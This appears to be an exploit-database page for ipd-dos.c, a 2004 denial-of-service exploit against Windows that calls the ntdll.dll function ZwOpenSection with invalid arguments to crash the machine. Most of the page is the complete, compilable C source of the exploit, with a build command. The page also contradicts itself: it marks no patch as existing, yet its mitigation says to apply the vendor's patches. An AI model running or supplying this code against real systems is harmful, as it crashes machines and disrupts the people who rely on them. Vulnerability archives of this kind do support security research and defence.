header-logo
Suggest Exploit
vendor:
by:
Next Generation Security S.L.
5.5
CVSS
MEDIUM
Denial of Service
399
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2004

ipd-dos.c

The ipd-dos.c file is a Denial of Service (DoS) exploit that targets the ZwOpenSection function in the ntdll.dll library. By calling the function with specific parameters, it causes the system to crash or become unresponsive, resulting in a DoS condition.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the vendor.
Source

Exploit-DB raw data:

/* 
*   ipd-dos.c 
* 
*   Copyright (c) 2002-2004 By Next Generation Security S.L. 
*   All rights   reserved 
* 
*   Compiles with: cl ipd-dos.c 
* 
*   Madrid, August 2004 
*/ 

#include <windows.h> 

#define MY_NULL 0x01 
typedef DWORD (* zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa); 

int main(int argc, char *argv[]) { 
HINSTANCE dll; 
zwopensection_TYPE my_ZwOpenSection; 

  if ((dll=LoadLibrary("ntdll.dll"))!=NULL) { 

    if ((my_ZwOpenSection=(zwopensection_TYPE)GetProcAddress(dll,"ZwOpenSection"))!=NULL) { 

        my_ZwOpenSection(MY_NULL,MY_NULL,MY_NULL); 

    } 
  } 

} 

// milw0rm.com [2004-08-18]

Navigation

Suggest Exploit

Services By CQR